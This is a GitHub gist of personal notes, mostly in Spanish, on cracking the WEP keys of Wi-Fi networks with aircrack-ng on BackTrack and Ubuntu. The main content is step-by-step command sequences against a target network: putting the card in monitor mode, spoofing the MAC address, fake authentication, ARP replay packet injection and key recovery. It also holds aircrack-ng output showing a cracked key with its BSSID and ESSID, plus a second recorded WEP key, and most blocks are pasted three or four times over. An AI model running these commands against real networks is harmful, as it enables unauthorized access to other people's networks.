Skip to content

Instantly share code, notes, and snippets.

@feliperomero3
Created July 10, 2018 22:11
Show Gist options
  • Save feliperomero3/3251412e1b9a63827cd6f6eadb2a89c4 to your computer and use it in GitHub Desktop.
Save feliperomero3/3251412e1b9a63827cd6f6eadb2a89c4 to your computer and use it in GitHub Desktop.
Aircrack-ng
Aircrack-ng 1.1 r2178
[00:00:07] Tested 2545 keys (got 14357 IVs)
KB depth byte(vote)
0 0/ 8 08(19968) 1E(19968) D1(19712) 68(19456) CD(19456) 0E(18688) F8(18688)
1 4/ 9 31(18944) A8(18944) 27(18944) 33(18944) C0(18432) 2B(18176) 45(18176)
2 3/ 5 04(19200) A3(18944) 17(18176) 69(18176) 7C(17920) D8(17920) 00(17664)
3 5/ 8 43(18688) 16(18432) 56(18432) 70(18432) D3(18432) 3D(18176) 0E(17920)
4 0/ 1 66(21248) 4C(19712) 7B(19456) 66(19200) 2E(18688) 90(18688) B8(18688)
KEY FOUND! [ 08:31:04:19:66 ]
Decrypted correctly: 100%
BSSID: 5C:4C:A9:61:02:DC
ESSID: INFINITUMeaed
KEY: 0831041966
18/12/2013 21:21
=====================================================
**************************** 2.4 GHz (802.11b/g/n) **********************************
channel frequency
(MHz) U.S. and
Canada Europe Spain France Japan Australia Venezuela Israel
1 2412 Yes Yes No Yes Yes Yes Yes No
2 2417 Yes Yes No Yes Yes Yes Yes No
3 2422 Yes Yes No Yes Yes Yes Yes Yes
4 2427 Yes Yes No Yes Yes Yes Yes Yes
5 2432 Yes Yes No Yes Yes Yes Yes Yes
6 2437 Yes Yes No Yes Yes Yes Yes Yes
7 2442 Yes Yes No Yes Yes Yes Yes Yes
8 2447 Yes Yes No Yes Yes Yes Yes Yes
9 2452 Yes Yes No Yes Yes Yes Yes Yes
10 2457 Yes Yes Yes Yes Yes Yes Yes No
11 2462 Yes Yes Yes Yes Yes Yes Yes No
12 2467 No Yes No Yes Yes Yes Yes No
13 2472 No Yes No Yes Yes Yes Yes No
14 2484 No No No No .11b only No No No
*********************************************************************************************
## 2WIRE227 wepkey 8304163212 ##
http://www.maxi-pedia.com/how+to+crack+WEP+with+intel+PRO+wireless+3945ABG
http://lifehacker.com/5305094/how-to-crack-a-wi+fi-networks-wep-password-with-backtrack
http://www.maxi-pedia.com/crack+WEP
// patch driver
http://www.aircrack-ng.org/doku.php?id=iwl3945
// fancy video
http://www.arturogoga.com/2010/01/30/hackear-contrasea-de-wifi-con-backtrack-4/
http://youtu.be/jETwvEDaJeQ
*********************** fixed channel mon0-1 ubuntu 11.04 iwl3945 *************************
http://hacklab.cl/wireless/aircrack-y-fixed-channel-1-solucion-al-problema/
http://ubuntuforums.org/showthread.php?t=1598930
http://blog.macuyiko.com/2010/11/ubuntu-1010-fixed-channel-mon0-1.html
http://foro.elhacker.net/wireless_en_linux/error_al_auditar_claves_wifi_ap_en_un_canal_distinto_al_de_mon0_en_canal_1-t326073.15.html
http://www.sumardi.net/2011/01/10/aircrack-fixed-channel-mon0-1/
*******************************************************************************************
****************************** BACKTRACK & INTEL 3945abg **********************************
http://www.neothermic.com/phpBB/viewtopic.php?t=138
http://www.itsolutionskb.com/2008/11/intel-wireless-3945abg-packet-injection-backtrack/
http://blog.yusri.com.my/v2/article.php/simple-wep-hacking
http://boreditguy.com/blog/?p=232
*******************************************************************************************
************************************** BACKTRACK 4 ****************************************
// Inicializar primero el daemon
wicd
wicd-client
// Después correr inicio/internet/wicd network manager y conectarse a una red
// en advanced settings elegir WEP (hex)
*******************************************************************************************
*********************************** KISMET (sniffer) **************************************
// Ubicación del archivo de configuración
/etc/kismet/kismet.config
*******************************************************************************************
************************************ INJECTION TEST ***************************************
// This is a basic test to determine if you card
// successfully supports injection.
aireplay-ng -9 wlan0
// NOTA: antes de hacer esta prueba se debe de
// poner la tarjeta en modo monitor.
*******************************************************************************************
********************************* CRACKING UBUNTU 11.04 *****************************************
// Ver lista de interfaces disponibles.
airmon-ng
// Detener
airmon-ng stop wlan0
// Deshabilitar
ifconfig wlan0 down
// Crear una MAC ficticia
macchanger --mac 00:11:22:33:44:55 wlan0
// Reinicia la interfaz
airmon-ng start wlan0 [9] // 9 es el canal, tal vez opcional? default=2
// Después de el comando anterior, debería
// imprimir "monitor mode enabled on...
// Now it's time to pick your network. Run:
airodump-ng mon0
// Now we're going to watch what's going on with that network you chose
// and capture that information to a file. Run:
// airodump-ng -c (channel) -w (file name) --bssid (bssid) (interface)
// Where (channel) is your network's channel, and (bssid) is the BSSID you just copied to
// clipboard. You can use the Shift+Insert key combination to paste it into the command.
// Enter anything descriptive for (file name). I chose "yoyo," which is the network's
// name i'm cracking.
airodump-ng -c 1 -w prueba --bssid 00:1E:10:C9:FC:98 mon0
// Otro ejemplo
airodump-ng --channel 6 --write lucylinx --bssid 00:14:95:80:82:B1 -a wifi0
// Donde 1 es el canal de mon0 (mi tarjeta), prueba es el archivo donde se guardará
// el WEP pass
************************** CRACKING 2.0 BackTrack 3 *********************************************
comando para la ayuda: --help
## PARTE 1 - PREPARACI�N DE LA INTERFAZ ##
modprobe -r iwl3945 // desmontar el controlador iwl3945
modprobe ipwraw // montar el controlador ipwraw
airmon-ng // Ver lista de interfaces disponibles, tomar en cuenta el
// canal de la red a atacar.
airmon-ng stop wifi0
ifconfig wifi0 down* // Opcional?
macchanger --mac 00:11:22:33:44:55 wifi0 // Cambiar MAC propia
airmon-ng start wifi0 N // N = canal (ej. 1,2,...,11)
## PARTE 2 - SNIFFING ##
airodump-ng wifi0 // Ver la lista de redes inal�mbricas disponibles
airodump-ng --channel N --write UN_NOMBRE --bssid MAC_A_ATACAR -a wifi0 // N = canal
// Abrir una nueva terminal...
/ Asegurarse de obtener "Association successful" en el siguiente comando
aireplay-ng --fakeauth 0 -a MAC_A_ATACAR -h MAC_PROPIA -e ESSID_A_ATACAR wifi0 // MAC_PROPIA (opcional)
## PARTE 3 - CRACKING ##
// Iniciar la inyecci�n de paquetes
aireplay-ng --arpreplay -b MAC_A_ATACAR -h MAC_PROPIA wifi0
// Despu�s de haber recolectado suficientes datos
// columna "#DATA" >20,000...
aircrack-ng -b MAC_A_ATACAR (UN_NOMBRE-01.cap)
// La terminal deber�a mostrar la clave WEP encontrada
## PARTE 4 - FINAL ##
modprobe -r ipwraw // desmontar el controlador ipwraw
modprobe iwl3945 // montar el controlador iwl3945
airmon-ng stop wlan0
ifconfig wlan0 up
***************************************************************************************************
************************** CRACKING 2.1 BackTrack 4 *********************************************
comando para la ayuda: --help
## PARTE 1 - PREPARACI�N DE LA INTERFAZ ##
airmon-ng // Ver lista de interfaces disponibles, tomar en cuenta el
// canal de la red a atacar.
airmon-ng stop wlan0
ifconfig wlan0 down* // Opcional?
macchanger --mac 00:11:22:33:44:55 wlan0 // Cambiar MAC propia
airmon-ng start wlan0 N // N = canal (ej. 1,2,...,11) default=2?
## PARTE 2 - SNIFFING ##
airodump-ng mon0 // Ver la lista de redes inal�mbricas disponibles
airodump-ng --channel N --write UN_NOMBRE --bssid MAC_A_ATACAR -a mon0 // N = canal
// Abrir una nueva terminal...
/ Asegurarse de obtener "Association successful" en el siguiente comando
aireplay-ng --fakeauth 0 -a MAC_A_ATACAR -h MAC_PROPIA -e ESSID_A_ATACAR mon0 // MAC_PROPIA (opcional)
## PARTE 3 - CRACKING ##
// Abrir nueva terminal
// Iniciar la inyecci�n de paquetes
aireplay-ng --arpreplay -b MAC_A_ATACAR -h MAC_PROPIA mon0
// Despu�s de haber recolectado suficientes datos
// columna "#DATA" >20,000...
aircrack-ng -b MAC_A_ATACAR (UN_NOMBRE-01.cap)
// La terminal deber�a mostrar la clave WEP encontrada
***************************************************************************************************
################################## UBUNTU 11.04 ###################################################
// Despu�s de descomprimir y correr make (compilaci�n) al correr make install,
// error al instalar un nuevo controlador (compat-wireless) m�s reciente.
make[1]: Leaving directory `/usr/src/linux-headers-2.6.38-8-generic'
Updating Ubuntu's initramfs for 2.6.38-8-generic under /boot/ ...
cryptsetup: WARNING: failed to detect canonical device of aufs
cryptsetup: WARNING: could not determine root device from /etc/fstab
Will now run update-grub to ensure grub will find the new initramfs ...
/usr/sbin/grub-probe: error: cannot stat `aufs'.
make: *** [install-modules] Error 1
####################################################################################################
Promiscuous mode on intel 3945abg, Associated Promiscuous mode will only work with Intel 3945 adapters
using version 10.5.0.3 or higher of the Intel PROSet Wireless software
http://forum.notebookreview.com/networking-wireless/247604-intel-3945abg-promiscuous-mode-how.html
http://seclists.org/pen-test/2008/Jan/174
**************************** 2.4 GHz (802.11b/g/n) **********************************
channel frequency
(MHz) U.S. and
Canada Europe Spain France Japan Australia Venezuela Israel
1 2412 Yes Yes No Yes Yes Yes Yes No
2 2417 Yes Yes No Yes Yes Yes Yes No
3 2422 Yes Yes No Yes Yes Yes Yes Yes
4 2427 Yes Yes No Yes Yes Yes Yes Yes
5 2432 Yes Yes No Yes Yes Yes Yes Yes
6 2437 Yes Yes No Yes Yes Yes Yes Yes
7 2442 Yes Yes No Yes Yes Yes Yes Yes
8 2447 Yes Yes No Yes Yes Yes Yes Yes
9 2452 Yes Yes No Yes Yes Yes Yes Yes
10 2457 Yes Yes Yes Yes Yes Yes Yes No
11 2462 Yes Yes Yes Yes Yes Yes Yes No
12 2467 No Yes No Yes Yes Yes Yes No
13 2472 No Yes No Yes Yes Yes Yes No
14 2484 No No No No .11b only No No No
*********************************************************************************************
## 2WIRE227 wepkey 8304163212 ##
http://www.maxi-pedia.com/how+to+crack+WEP+with+intel+PRO+wireless+3945ABG
http://lifehacker.com/5305094/how-to-crack-a-wi+fi-networks-wep-password-with-backtrack
http://www.maxi-pedia.com/crack+WEP
// patch driver
http://www.aircrack-ng.org/doku.php?id=iwl3945
// fancy video
http://www.arturogoga.com/2010/01/30/hackear-contrasea-de-wifi-con-backtrack-4/
http://youtu.be/jETwvEDaJeQ
*********************** fixed channel mon0-1 ubuntu 11.04 iwl3945 *************************
http://hacklab.cl/wireless/aircrack-y-fixed-channel-1-solucion-al-problema/
http://ubuntuforums.org/showthread.php?t=1598930
http://blog.macuyiko.com/2010/11/ubuntu-1010-fixed-channel-mon0-1.html
http://foro.elhacker.net/wireless_en_linux/error_al_auditar_claves_wifi_ap_en_un_canal_distinto_al_de_mon0_en_canal_1-t326073.15.html
http://www.sumardi.net/2011/01/10/aircrack-fixed-channel-mon0-1/
*******************************************************************************************
****************************** BACKTRACK & INTEL 3945abg **********************************
http://www.neothermic.com/phpBB/viewtopic.php?t=138
http://www.itsolutionskb.com/2008/11/intel-wireless-3945abg-packet-injection-backtrack/
http://blog.yusri.com.my/v2/article.php/simple-wep-hacking
http://boreditguy.com/blog/?p=232
*******************************************************************************************
************************************** BACKTRACK 4 ****************************************
// Inicializar primero el daemon
wicd
wicd-client
// Después correr inicio/internet/wicd network manager y conectarse a una red
// en advanced settings elegir WEP (hex)
*******************************************************************************************
*********************************** KISMET (sniffer) **************************************
// Ubicación del archivo de configuración
/etc/kismet/kismet.config
*******************************************************************************************
************************************ INJECTION TEST ***************************************
// This is a basic test to determine if you card
// successfully supports injection.
aireplay-ng -9 wlan0
// NOTA: antes de hacer esta prueba se debe de
// poner la tarjeta en modo monitor.
*******************************************************************************************
********************************* CRACKING UBUNTU 11.04 *****************************************
// Ver lista de interfaces disponibles.
airmon-ng
// Detener
airmon-ng stop wlan0
// Deshabilitar
ifconfig wlan0 down
// Crear una MAC ficticia
macchanger --mac 00:11:22:33:44:55 wlan0
// Reinicia la interfaz
airmon-ng start wlan0 [9] // 9 es el canal, tal vez opcional? default=2
// Después de el comando anterior, debería
// imprimir "monitor mode enabled on...
// Now it's time to pick your network. Run:
airodump-ng mon0
// Now we're going to watch what's going on with that network you chose
// and capture that information to a file. Run:
// airodump-ng -c (channel) -w (file name) --bssid (bssid) (interface)
// Where (channel) is your network's channel, and (bssid) is the BSSID you just copied to
// clipboard. You can use the Shift+Insert key combination to paste it into the command.
// Enter anything descriptive for (file name). I chose "yoyo," which is the network's
// name i'm cracking.
airodump-ng -c 1 -w prueba --bssid 00:1E:10:C9:FC:98 mon0
// Otro ejemplo
airodump-ng --channel 6 --write lucylinx --bssid 00:14:95:80:82:B1 -a wifi0
// Donde 1 es el canal de mon0 (mi tarjeta), prueba es el archivo donde se guardará
// el WEP pass
************************** CRACKING 2.0 BackTrack 3 *********************************************
comando para la ayuda: --help
## PARTE 1 - PREPARACI�N DE LA INTERFAZ ##
modprobe -r iwl3945 // desmontar el controlador iwl3945
modprobe ipwraw // montar el controlador ipwraw
airmon-ng // Ver lista de interfaces disponibles, tomar en cuenta el
// canal de la red a atacar.
airmon-ng stop wifi0
ifconfig wifi0 down* // Opcional?
macchanger --mac 00:11:22:33:44:55 wifi0 // Cambiar MAC propia
airmon-ng start wifi0 N // N = canal (ej. 1,2,...,11)
## PARTE 2 - SNIFFING ##
airodump-ng wifi0 // Ver la lista de redes inal�mbricas disponibles
airodump-ng --channel N --write UN_NOMBRE --bssid MAC_A_ATACAR -a wifi0 // N = canal
// Abrir una nueva terminal...
/ Asegurarse de obtener "Association successful" en el siguiente comando
aireplay-ng --fakeauth 0 -a MAC_A_ATACAR -h MAC_PROPIA -e ESSID_A_ATACAR wifi0 // MAC_PROPIA (opcional)
## PARTE 3 - CRACKING ##
// Iniciar la inyecci�n de paquetes
aireplay-ng --arpreplay -b MAC_A_ATACAR -h MAC_PROPIA wifi0
// Despu�s de haber recolectado suficientes datos
// columna "#DATA" >20,000...
aircrack-ng -b MAC_A_ATACAR (UN_NOMBRE-01.cap)
// La terminal deber�a mostrar la clave WEP encontrada
## PARTE 4 - FINAL ##
modprobe -r ipwraw // desmontar el controlador ipwraw
modprobe iwl3945 // montar el controlador iwl3945
airmon-ng stop wlan0
ifconfig wlan0 up
***************************************************************************************************
************************** CRACKING 2.1 BackTrack 4 *********************************************
comando para la ayuda: --help
## PARTE 1 - PREPARACI�N DE LA INTERFAZ ##
airmon-ng // Ver lista de interfaces disponibles, tomar en cuenta el
// canal de la red a atacar.
airmon-ng stop wlan0
ifconfig wlan0 down* // Opcional?
macchanger --mac 00:11:22:33:44:55 wlan0 // Cambiar MAC propia
airmon-ng start wlan0 N // N = canal (ej. 1,2,...,11) default=2?
## PARTE 2 - SNIFFING ##
airodump-ng mon0 // Ver la lista de redes inal�mbricas disponibles
airodump-ng --channel N --write UN_NOMBRE --bssid MAC_A_ATACAR -a mon0 // N = canal
// Abrir una nueva terminal...
/ Asegurarse de obtener "Association successful" en el siguiente comando
aireplay-ng --fakeauth 0 -a MAC_A_ATACAR [-h MAC_PROPIA] -e ESSID_A_ATACAR mon0 // MAC_PROPIA (opcional)
## PARTE 3 - CRACKING ##
// Abrir nueva terminal
// Iniciar la inyecci�n de paquetes
aireplay-ng --arpreplay -b MAC_A_ATACAR [-h MAC_PROPIA] mon0
// Despu�s de haber recolectado suficientes datos
// columna "#DATA" >20,000...
aircrack-ng -b MAC_A_ATACAR UN_NOMBRE-01.cap
// La terminal deber�a mostrar la clave WEP encontrada
***************************************************************************************************
################################## UBUNTU 11.04 ###################################################
// Despu�s de descomprimir y correr make (compilaci�n) al correr make install,
// error al instalar un nuevo controlador (compat-wireless) m�s reciente.
make[1]: Leaving directory `/usr/src/linux-headers-2.6.38-8-generic'
Updating Ubuntu's initramfs for 2.6.38-8-generic under /boot/ ...
cryptsetup: WARNING: failed to detect canonical device of aufs
cryptsetup: WARNING: could not determine root device from /etc/fstab
Will now run update-grub to ensure grub will find the new initramfs ...
/usr/sbin/grub-probe: error: cannot stat `aufs'.
make: *** [install-modules] Error 1
####################################################################################################
Promiscuous mode on intel 3945abg, Associated Promiscuous mode will only work with Intel 3945 adapters
using version 10.5.0.3 or higher of the Intel PROSet Wireless software
http://forum.notebookreview.com/networking-wireless/247604-intel-3945abg-promiscuous-mode-how.html
http://seclists.org/pen-test/2008/Jan/174
**************************** 2.4 GHz (802.11b/g/n) **********************************
channel frequency
(MHz) U.S. and
Canada Europe Spain France Japan Australia Venezuela Israel
1 2412 Yes Yes No Yes Yes Yes Yes No
2 2417 Yes Yes No Yes Yes Yes Yes No
3 2422 Yes Yes No Yes Yes Yes Yes Yes
4 2427 Yes Yes No Yes Yes Yes Yes Yes
5 2432 Yes Yes No Yes Yes Yes Yes Yes
6 2437 Yes Yes No Yes Yes Yes Yes Yes
7 2442 Yes Yes No Yes Yes Yes Yes Yes
8 2447 Yes Yes No Yes Yes Yes Yes Yes
9 2452 Yes Yes No Yes Yes Yes Yes Yes
10 2457 Yes Yes Yes Yes Yes Yes Yes No
11 2462 Yes Yes Yes Yes Yes Yes Yes No
12 2467 No Yes No Yes Yes Yes Yes No
13 2472 No Yes No Yes Yes Yes Yes No
14 2484 No No No No .11b only No No No
*********************************************************************************************
## 2WIRE227 wepkey 8304163212 ##
http://www.maxi-pedia.com/how+to+crack+WEP+with+intel+PRO+wireless+3945ABG
http://lifehacker.com/5305094/how-to-crack-a-wi+fi-networks-wep-password-with-backtrack
http://www.maxi-pedia.com/crack+WEP
// patch driver
http://www.aircrack-ng.org/doku.php?id=iwl3945
// fancy video
http://www.arturogoga.com/2010/01/30/hackear-contrasea-de-wifi-con-backtrack-4/
http://youtu.be/jETwvEDaJeQ
*********************** fixed channel mon0-1 ubuntu 11.04 iwl3945 *************************
http://hacklab.cl/wireless/aircrack-y-fixed-channel-1-solucion-al-problema/
http://ubuntuforums.org/showthread.php?t=1598930
http://blog.macuyiko.com/2010/11/ubuntu-1010-fixed-channel-mon0-1.html
http://foro.elhacker.net/wireless_en_linux/error_al_auditar_claves_wifi_ap_en_un_canal_distinto_al_de_mon0_en_canal_1-t326073.15.html
http://www.sumardi.net/2011/01/10/aircrack-fixed-channel-mon0-1/
*******************************************************************************************
****************************** BACKTRACK & INTEL 3945abg **********************************
http://www.neothermic.com/phpBB/viewtopic.php?t=138
http://www.itsolutionskb.com/2008/11/intel-wireless-3945abg-packet-injection-backtrack/
http://blog.yusri.com.my/v2/article.php/simple-wep-hacking
http://boreditguy.com/blog/?p=232
*******************************************************************************************
************************************** BACKTRACK 4 ****************************************
// Inicializar primero el daemon
wicd
wicd-client
// Después correr inicio/internet/wicd network manager y conectarse a una red
// en advanced settings elegir WEP (hex)
*******************************************************************************************
*********************************** KISMET (sniffer) **************************************
// Ubicación del archivo de configuración
/etc/kismet/kismet.config
*******************************************************************************************
************************************ INJECTION TEST ***************************************
// This is a basic test to determine if you card
// successfully supports injection.
aireplay-ng -9 wlan0
// NOTA: antes de hacer esta prueba se debe de
// poner la tarjeta en modo monitor.
*******************************************************************************************
********************************* CRACKING UBUNTU 11.04 *****************************************
// Ver lista de interfaces disponibles.
airmon-ng
// Detener
airmon-ng stop wlan0
// Deshabilitar
ifconfig wlan0 down
// Crear una MAC ficticia
macchanger --mac 00:11:22:33:44:55 wlan0
// Reinicia la interfaz
airmon-ng start wlan0 [9] // 9 es el canal, tal vez opcional? default=1
// Después de el comando anterior, debería
// imprimir "monitor mode enabled on...
// Now it's time to pick your network. Run:
airodump-ng mon0
// Now we're going to watch what's going on with that network you chose
// and capture that information to a file. Run:
// airodump-ng -c (channel) -w (file name) --bssid (bssid) (interface)
// Where (channel) is your network's channel, and (bssid) is the BSSID you just copied to
// clipboard. You can use the Shift+Insert key combination to paste it into the command.
// Enter anything descriptive for (file name). I chose "yoyo," which is the network's
// name i'm cracking.
airodump-ng -c 1 -w prueba --bssid 00:1E:10:C9:FC:98 mon0
// Otro ejemplo
airodump-ng --channel 6 --write lucylinx --bssid 00:14:95:80:82:B1 -a wifi0
// Donde 1 es el canal de mon0 (mi tarjeta), prueba es el archivo donde se guardará
// el WEP pass
************************** CRACKING 2.0 BackTrack 3 *********************************************
comando para la ayuda: --help
## PARTE 1 - PREPARACI�N DE LA INTERFAZ ##
modprobe -r iwl3945 // desmontar el controlador iwl3945
modprobe ipwraw // montar el controlador ipwraw
airmon-ng // Ver lista de interfaces disponibles, tomar en cuenta el
// canal de la red a atacar.
airmon-ng stop wifi0
ifconfig wifi0 down* // Opcional?
macchanger --mac 00:11:22:33:44:55 wifi0 // Cambiar MAC propia
airmon-ng start wifi0 N // N = canal (ej. 1,2,...,11)
## PARTE 2 - SNIFFING ##
airodump-ng wifi0 // Ver la lista de redes inal�mbricas disponibles
airodump-ng --channel N --write UN_NOMBRE --bssid MAC_A_ATACAR -a wifi0 // N = canal
// Abrir una nueva terminal...
/ Asegurarse de obtener "Association successful" en el siguiente comando
aireplay-ng --fakeauth 0 -a MAC_A_ATACAR -h MAC_PROPIA -e ESSID_A_ATACAR wifi0 // MAC_PROPIA (opcional)
## PARTE 3 - CRACKING ##
// Iniciar la inyecci�n de paquetes
aireplay-ng --arpreplay -b MAC_A_ATACAR -h MAC_PROPIA wifi0
// Despu�s de haber recolectado suficientes datos
// columna "#DATA" >20,000...
aircrack-ng -b MAC_A_ATACAR (UN_NOMBRE-01.cap)
// La terminal deber�a mostrar la clave WEP encontrada
## PARTE 4 - FINAL ##
modprobe -r ipwraw // desmontar el controlador ipwraw
modprobe iwl3945 // montar el controlador iwl3945
airmon-ng stop wlan0
ifconfig wlan0 up
***************************************************************************************************
************************** CRACKING 2.1 BackTrack 4 *********************************************
comando para la ayuda: --help
## PARTE 1 - PREPARACI�N DE LA INTERFAZ ##
airmon-ng // Ver lista de interfaces disponibles, tomar en cuenta el
// canal de la red a atacar.
airmon-ng stop wlan0
ifconfig wlan0 down* // Opcional?
macchanger --mac 00:11:22:33:44:55 wlan0 // Cambiar MAC propia
airmon-ng start wlan0 N // N = canal (ej. 1,2,...,11)
## PARTE 2 - SNIFFING ##
airodump-ng mon0 // Ver la lista de redes inal�mbricas disponibles
airodump-ng --channel N --write UN_NOMBRE --bssid MAC_A_ATACAR -a mon0 // N = canal
// Abrir una nueva terminal...
/ Asegurarse de obtener "Association successful" en el siguiente comando
aireplay-ng --fakeauth 0 -a MAC_A_ATACAR -h MAC_PROPIA -e ESSID_A_ATACAR mon0 // MAC_PROPIA (opcional)
## PARTE 3 - CRACKING ##
// Abrir nueva terminal
// Iniciar la inyecci�n de paquetes
aireplay-ng --arpreplay -b MAC_A_ATACAR -h MAC_PROPIA mon0ai
// Despu�s de haber recolectado suficientes datos
// columna "#DATA" >20,000...
aircrack-ng -b MAC_A_ATACAR (UN_NOMBRE-01.cap)
// La terminal deber�a mostrar la clave WEP encontrada
***************************************************************************************************
################################## UBUNTU 11.04 ###################################################
// Despu�s de descomprimir y correr make (compilaci�n) al correr make install,
// error al instalar un nuevo controlador (compat-wireless) m�s reciente.
make[1]: Leaving directory `/usr/src/linux-headers-2.6.38-8-generic'
Updating Ubuntu's initramfs for 2.6.38-8-generic under /boot/ ...
cryptsetup: WARNING: failed to detect canonical device of aufs
cryptsetup: WARNING: could not determine root device from /etc/fstab
Will now run update-grub to ensure grub will find the new initramfs ...
/usr/sbin/grub-probe: error: cannot stat `aufs'.
make: *** [install-modules] Error 1
6f8b1459229b360d4b00a8ae410e8ab4 *crackWEP.txt
**************************** 2.4 GHz (802.11b/g/n) **********************************
channel frequency
(MHz) U.S. and
Canada Europe Spain France Japan Australia Venezuela Israel
1 2412 Yes Yes No Yes Yes Yes Yes No
2 2417 Yes Yes No Yes Yes Yes Yes No
3 2422 Yes Yes No Yes Yes Yes Yes Yes
4 2427 Yes Yes No Yes Yes Yes Yes Yes
5 2432 Yes Yes No Yes Yes Yes Yes Yes
6 2437 Yes Yes No Yes Yes Yes Yes Yes
7 2442 Yes Yes No Yes Yes Yes Yes Yes
8 2447 Yes Yes No Yes Yes Yes Yes Yes
9 2452 Yes Yes No Yes Yes Yes Yes Yes
10 2457 Yes Yes Yes Yes Yes Yes Yes No
11 2462 Yes Yes Yes Yes Yes Yes Yes No
12 2467 No Yes No Yes Yes Yes Yes No
13 2472 No Yes No Yes Yes Yes Yes No
14 2484 No No No No .11b only No No No
*********************************************************************************************
## 2WIRE227 wepkey 8304163212 ##
http://www.maxi-pedia.com/how+to+crack+WEP+with+intel+PRO+wireless+3945ABG
http://lifehacker.com/5305094/how-to-crack-a-wi+fi-networks-wep-password-with-backtrack
http://www.maxi-pedia.com/crack+WEP
// patch driver
http://www.aircrack-ng.org/doku.php?id=iwl3945
// fancy video
http://www.arturogoga.com/2010/01/30/hackear-contrasea-de-wifi-con-backtrack-4/
http://youtu.be/jETwvEDaJeQ
*********************** fixed channel mon0-1 ubuntu 11.04 iwl3945 *************************
http://hacklab.cl/wireless/aircrack-y-fixed-channel-1-solucion-al-problema/
http://ubuntuforums.org/showthread.php?t=1598930
http://blog.macuyiko.com/2010/11/ubuntu-1010-fixed-channel-mon0-1.html
http://foro.elhacker.net/wireless_en_linux/error_al_auditar_claves_wifi_ap_en_un_canal_distinto_al_de_mon0_en_canal_1-t326073.15.html
http://www.sumardi.net/2011/01/10/aircrack-fixed-channel-mon0-1/
*******************************************************************************************
****************************** BACKTRACK & INTEL 3945abg **********************************
http://www.neothermic.com/phpBB/viewtopic.php?t=138
http://www.itsolutionskb.com/2008/11/intel-wireless-3945abg-packet-injection-backtrack/
http://blog.yusri.com.my/v2/article.php/simple-wep-hacking
http://boreditguy.com/blog/?p=232
*******************************************************************************************
************************************** BACKTRACK 4 ****************************************
// Inicializar primero el daemon
wicd
wicd-client
// Después correr inicio/internet/wicd network manager y conectarse a una red
// en advanced settings elegir WEP (hex)
*******************************************************************************************
*********************************** KISMET (sniffer) **************************************
// Ubicación del archivo de configuración
/etc/kismet/kismet.config
*******************************************************************************************
************************************ INJECTION TEST ***************************************
// This is a basic test to determine if you card
// successfully supports injection.
aireplay-ng -9 wlan0
// NOTA: antes de hacer esta prueba se debe de
// poner la tarjeta en modo monitor.
*******************************************************************************************
********************************* CRACKING UBUNTU 11.04 *****************************************
// Ver lista de interfaces disponibles.
airmon-ng
// Detener
airmon-ng stop wlan0
// Deshabilitar
ifconfig wlan0 down
// Crear una MAC ficticia
macchanger --mac 00:11:22:33:44:55 wlan0
// Reinicia la interfaz
airmon-ng start wlan0 [9] // 9 es el canal, tal vez opcional? default=1
// Después de el comando anterior, debería
// imprimir "monitor mode enabled on...
// Now it's time to pick your network. Run:
airodump-ng mon0
// Now we're going to watch what's going on with that network you chose
// and capture that information to a file. Run:
// airodump-ng -c (channel) -w (file name) --bssid (bssid) (interface)
// Where (channel) is your network's channel, and (bssid) is the BSSID you just copied to
// clipboard. You can use the Shift+Insert key combination to paste it into the command.
// Enter anything descriptive for (file name). I chose "yoyo," which is the network's
// name i'm cracking.
airodump-ng -c 1 -w prueba --bssid 00:1E:10:C9:FC:98 mon0
// Otro ejemplo
airodump-ng --channel 6 --write lucylinx --bssid 00:14:95:80:82:B1 -a wifi0
// Donde 1 es el canal de mon0 (mi tarjeta), prueba es el archivo donde se guardará
// el WEP pass
************************** CRACKING 2.0 BackTrack 3 *********************************************
comando para la ayuda: --help
## PARTE 1 - PREPARACI�N DE LA INTERFAZ ##
modprobe -r iwl3945 // desmontar el controlador iwl3945
modprobe ipwraw // montar el controlador ipwraw
airmon-ng // Ver lista de interfaces disponibles, tomar en cuenta el
// canal de la red a atacar.
airmon-ng stop wifi0
ifconfig wifi0 down* // Opcional?
macchanger --mac 00:11:22:33:44:55 wifi0 // Cambiar MAC propia
airmon-ng start wifi0 N // N = canal (ej. 1,2,...,11)
## PARTE 2 - SNIFFING ##
airodump-ng wifi0 // Ver la lista de redes inal�mbricas disponibles
airodump-ng --channel N --write UN_NOMBRE --bssid MAC_A_ATACAR -a wifi0 // N = canal
// Abrir una nueva terminal...
/ Asegurarse de obtener "Association successful" en el siguiente comando
aireplay-ng --fakeauth 0 -a MAC_A_ATACAR -h MAC_PROPIA -e ESSID_A_ATACAR wifi0 // MAC_PROPIA (opcional)
## PARTE 3 - CRACKING ##
// Iniciar la inyecci�n de paquetes
aireplay-ng --arpreplay -b MAC_A_ATACAR -h MAC_PROPIA wifi0
// Despu�s de haber recolectado suficientes datos
// columna "#DATA" >20,000...
aircrack-ng -b MAC_A_ATACAR (UN_NOMBRE-01.cap)
// La terminal deber�a mostrar la clave WEP encontrada
## PARTE 4 - FINAL ##
modprobe -r ipwraw // desmontar el controlador ipwraw
modprobe iwl3945 // montar el controlador iwl3945
airmon-ng stop wlan0
ifconfig wlan0 up
***************************************************************************************************
************************** CRACKING 2.1 BackTrack 4 *********************************************
comando para la ayuda: --help
## PARTE 1 - PREPARACI�N DE LA INTERFAZ ##
airmon-ng // Ver lista de interfaces disponibles, tomar en cuenta el
// canal de la red a atacar.
airmon-ng stop wifi0
ifconfig wifi0 down* // Opcional?
macchanger --mac 00:11:22:33:44:55 wifi0 // Cambiar MAC propia
airmon-ng start wifi0 N // N = canal (ej. 1,2,...,11)
## PARTE 2 - SNIFFING ##
airodump-ng wifi0 // Ver la lista de redes inal�mbricas disponibles
airodump-ng --channel N --write UN_NOMBRE --bssid MAC_A_ATACAR -a wifi0 // N = canal
// Abrir una nueva terminal...
/ Asegurarse de obtener "Association successful" en el siguiente comando
aireplay-ng --fakeauth 0 -a MAC_A_ATACAR -h MAC_PROPIA -e ESSID_A_ATACAR wifi0 // MAC_PROPIA (opcional)
## PARTE 3 - CRACKING ##
// Iniciar la inyecci�n de paquetes
aireplay-ng --arpreplay -b MAC_A_ATACAR -h MAC_PROPIA wifi0
// Despu�s de haber recolectado suficientes datos
// columna "#DATA" >20,000...
aircrack-ng -b MAC_A_ATACAR (UN_NOMBRE-01.cap)
// La terminal deber�a mostrar la clave WEP encontrada
***************************************************************************************************
################################## UBUNTU 11.04 ###################################################
// Despu�s de descomprimir y correr make (compilaci�n) al correr make install,
// error al instalar un nuevo controlador (compat-wireless) m�s reciente.
make[1]: Leaving directory `/usr/src/linux-headers-2.6.38-8-generic'
Updating Ubuntu's initramfs for 2.6.38-8-generic under /boot/ ...
